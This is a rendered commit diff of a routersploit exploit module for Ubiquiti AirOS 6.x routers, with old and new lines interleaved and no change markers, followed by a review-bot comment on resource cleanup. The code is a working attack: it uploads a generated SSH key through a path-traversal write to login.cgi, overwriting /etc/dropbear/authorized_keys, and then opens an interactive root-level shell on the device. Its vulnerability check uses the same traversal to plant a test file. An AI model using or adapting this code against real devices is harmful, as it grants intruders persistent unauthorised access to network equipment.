Commit
24cb2588
authored
Apr 27, 2016
by
root
Added interactive SSH Shell functionality
parent
0b8359ce
Showing
1 changed file
with
80 additions
and
34 deletions
+80
-34
airos_6_x.py
routersploit/modules/exploits/ubiquiti/airos_6_x.py
+80
-34
routersploit/modules/exploits/ubiquiti/airos_6_x.py
import
string
,
random
,
requests
,
tempfile
,
os
.
path
import
requests
,
tempfile
,
os
.
path
import
paramiko
,
StringIO
,
termios
,
tty
,
sys
,
select
,
socket
from
routersploit
import
(
from
routersploit
import
(
exploits
,
exploits
,
print_success
,
print_success
,
...
@@ -36,7 +37,7 @@ class Exploit(exploits.Exploit):
...
@@ -36,7 +37,7 @@ class Exploit(exploits.Exploit):
}
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. https://192.168.1.1'
)
#Target address
target
=
exploits
.
Option
(
''
,
'Target address e.g. https://192.168.1.1'
)
#Target address
port
=
exploits
.
Option
(
80
,
'Target port
'
)
#Default port
port
=
exploits
.
Option
(
443
,
'Target port e.g. 443
'
)
#Default port
#Disable certificate verification warnings
#Disable certificate verification warnings
requests
.
packages
.
urllib3
.
disable_warnings
()
requests
.
packages
.
urllib3
.
disable_warnings
()
...
@@ -46,37 +47,86 @@ class Exploit(exploits.Exploit):
...
@@ -46,37 +47,86 @@ class Exploit(exploits.Exploit):
print_success
(
'Target is vulnerable'
)
print_success
(
'Target is vulnerable'
)
print_success
(
'Trying to exploit by uploading SSH public key'
)
print_success
(
'Trying to exploit by uploading SSH public key'
)
if
(
os
.
path
.
isfile
(
os
.
path
.
expanduser
(
'~/.ssh/id_rsa.pub'
))):
key
=
paramiko
.
RSAKey
.
generate
(
1024
)
upload_params
=
{
'file'
:
(
'../../etc/dropbear/authorized_keys'
,
open
(
os
.
path
.
expanduser
(
'~/.ssh/id_rsa.pub'
)),
{
'Expect'
:
''
})}
public_key
=
key
.
get_base64
()
private_key
=
StringIO
.
StringIO
()
try
:
key
.
write_private_key
(
private_key
)
url
=
sanitize_url
(
'{0}:{1}/'
.
format
(
self
.
target
,
self
.
port
))
requests
.
post
(
url
+
'login.cgi'
,
files
=
upload_params
,
verify
=
False
)
except
Exception
,
e
:
tmp_file_pubkey
=
tempfile
.
TemporaryFile
()
print
e
tmp_file_pubkey
.
write
(
'ssh-rsa '
+
public_key
)
print_error
(
'Something wrong happened while uploading SSH public key'
)
tmp_file_pubkey
.
seek
(
0
)
else
:
upload_params
=
{
'file'
:
(
'../../etc/dropbear/authorized_keys'
,
tmp_file_pubkey
,
{
'Expect'
:
''
})}
print_success
(
'Appareantly the exploit worked fine'
)
print_success
(
'Try the following command to connect to router'
)
ip_target
=
self
.
target
.
replace
(
'https://'
,
''
)
upload_url
=
sanitize_url
(
'{0}:{1}/login.cgi'
.
format
(
self
.
target
,
self
.
port
))
ip_target
=
ip_target
.
replace
(
'http://'
,
'/'
)
response
=
http_request
(
url
=
upload_url
,
method
=
'POST'
,
files
=
upload_params
)
ip_target
=
ip_target
.
replace
(
'/'
,
''
)
print_info
(
'ssh {0} -l ubnt'
.
format
(
ip_target
))
if
(
response
is
None
):
print_error
(
'Something was wrong while uploading the SSH Public Key'
)
return
else
:
print_success
(
'Appareantly the exploit worked fine'
)
print_error
(
'The SSH public key does not exist. You must to generate it'
)
print_success
(
'Trying to invoke a interactive SSH Shell'
)
client
=
paramiko
.
SSHClient
()
client
.
set_missing_host_key_policy
(
paramiko
.
AutoAddPolicy
())
pseudo_privkey_file
=
StringIO
.
StringIO
(
private_key
.
getvalue
())
pkey
=
paramiko
.
RSAKey
.
from_private_key
(
pseudo_privkey_file
)
pseudo_privkey_file
.
close
()
ip_target
=
self
.
target
.
replace
(
'https://'
,
''
)
ip_target
=
ip_target
.
replace
(
'http://'
,
''
)
ip_target
=
ip_target
.
replace
(
'/'
,
''
)
client
.
connect
(
ip_target
,
22
,
username
=
'ubnt'
,
pkey
=
pkey
)
# invoking interactive shell
chan
=
client
.
invoke_shell
()
oldtty
=
termios
.
tcgetattr
(
sys
.
stdin
)
try
:
tty
.
setraw
(
sys
.
stdin
.
fileno
())
tty
.
setcbreak
(
sys
.
stdin
.
fileno
())
chan
.
settimeout
(
0.0
)
while
(
True
):
r
,
w
,
e
=
select
.
select
([
chan
,
sys
.
stdin
],
[],
[])
if
(
chan
in
r
):
try
:
x
=
unicode
(
chan
.
recv
(
1024
))
if
(
len
(
x
)
==
0
):
sys
.
stdout
.
write
(
'
\r\n
Exiting...
\r\n
'
)
break
sys
.
stdout
.
write
(
x
)
sys
.
stdout
.
flush
()
except
socket
.
timeout
:
pass
if
(
sys
.
stdin
in
r
):
x
=
sys
.
stdin
.
read
(
1
)
if
(
len
(
x
)
==
0
):
break
chan
.
send
(
x
)
finally
:
termios
.
tcsetattr
(
sys
.
stdin
,
termios
.
TCSADRAIN
,
oldtty
)
private_key
.
close
()
else
:
else
:
print_error
(
'Target is not vulnerable'
)
print_error
(
'Target is not vulnerable'
)
@mute
@mute
def
check
(
self
):
def
check
(
self
):
url
=
sanitize_url
(
'{0}:{1}/'
.
format
(
self
.
target
,
self
.
port
))
base_url
=
sanitize_url
(
'{0}:{1}/'
.
format
(
self
.
target
,
self
.
port
))
response
=
http_request
(
url
=
url
+
'login.cgi'
,
method
=
'GET'
)
upload_url
=
base_url
+
'login.cgi'
response
=
http_request
(
url
=
upload_url
,
method
=
'GET'
)
if
(
response
is
None
):
if
(
response
is
None
):
return
False
#Target not vulnerable
return
False
#Target not vulnerable
...
@@ -89,29 +139,25 @@ class Exploit(exploits.Exploit):
...
@@ -89,29 +139,25 @@ class Exploit(exploits.Exploit):
upload_params
=
{
'file'
:
(
'../../../../tmp/airview.uavr'
,
tmp_payload
,
{
'Expect'
:
''
})}
upload_params
=
{
'file'
:
(
'../../../../tmp/airview.uavr'
,
tmp_payload
,
{
'Expect'
:
''
})}
try
:
response
=
http_request
(
url
=
upload_url
,
method
=
'POST'
,
files
=
upload_params
)
requests
.
post
(
url
+
'login.cgi'
,
files
=
upload_params
,
verify
=
False
)
tmp_payload
.
close
()
tmp_payload
.
close
()
except
requests
.
exceptions
.
RequestException
:
if
(
response
is
None
):
tmp_payload
.
close
()
return
False
#Target not vulnerable
return
False
#Target not vulnerable
#Response to verify if the upload was done correctly
#Response to verify if the upload was done correctly
verify_upload
=
http_request
(
url
=
url
+
'airview.uavr'
,
method
=
'GET'
)
airview_url
=
base_url
+
'airview.uavr'
verify_upload
=
http_request
(
url
=
airview_url
,
method
=
'GET'
)
#Upload empty file to "clear" the airview.uavr file
#Upload empty file to "clear" the airview.uavr file
clean_tmp_file
=
tempfile
.
TemporaryFile
()
clean_tmp_file
=
tempfile
.
TemporaryFile
()
clean_tmp_file
.
write
(
''
)
clean_tmp_file
.
seek
(
0
)
clean_tmp_file
.
seek
(
0
)
upload_params
=
{
'file'
:
(
'../../../../tmp/airview.uavr'
,
clean_tmp_file
,
{
'Expect'
:
''
})}
upload_params
=
{
'file'
:
(
'../../../../tmp/airview.uavr'
,
clean_tmp_file
,
{
'Expect'
:
''
})}
try
:
http_request
(
url
=
upload_url
,
method
=
'POST'
,
files
=
upload_params
)
requests
.
post
(
url
+
'login.cgi'
.
format
(
self
.
target
),
files
=
upload_params
,
verify
=
False
)
clean_tmp_file
.
close
()
clean_tmp_file
.
close
()
except
requests
.
exceptions
.
RequestException
:
clean_tmp_file
.
close
()
if
(
'vulnerable'
+
rand_str
in
verify_upload
.
text
):
if
(
'vulnerable'
+
rand_str
in
verify_upload
.
text
):
return
True
return
True
...
...
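Review bot: The new run() path never releases what it opens: as far as the rendered lines show, `tmp_file_pubkey` and the paramiko `client` are not closed anywhere, and `private_key.close()` sits in the `finally:` of the terminal loop, so the early `return` after a failed upload and any exception raised by `client.connect(...)` skip it. Putting everything after key generation under one `try`/`finally` that calls `tmp_file_pubkey.close()`, `client.close()` and `private_key.close()` would match the way check() closes `tmp_payload` and `clean_tmp_file`. The page interleaves old and new lines without markers, so this reading of the new side is inferred. A comment above the upload should also state that it replaces the device's dropbear `authorized_keys` and that the generated key stays installed after the shell exits, e.g. `# NOTE: overwrites authorized_keys on the device; the uploaded key persists after this session`.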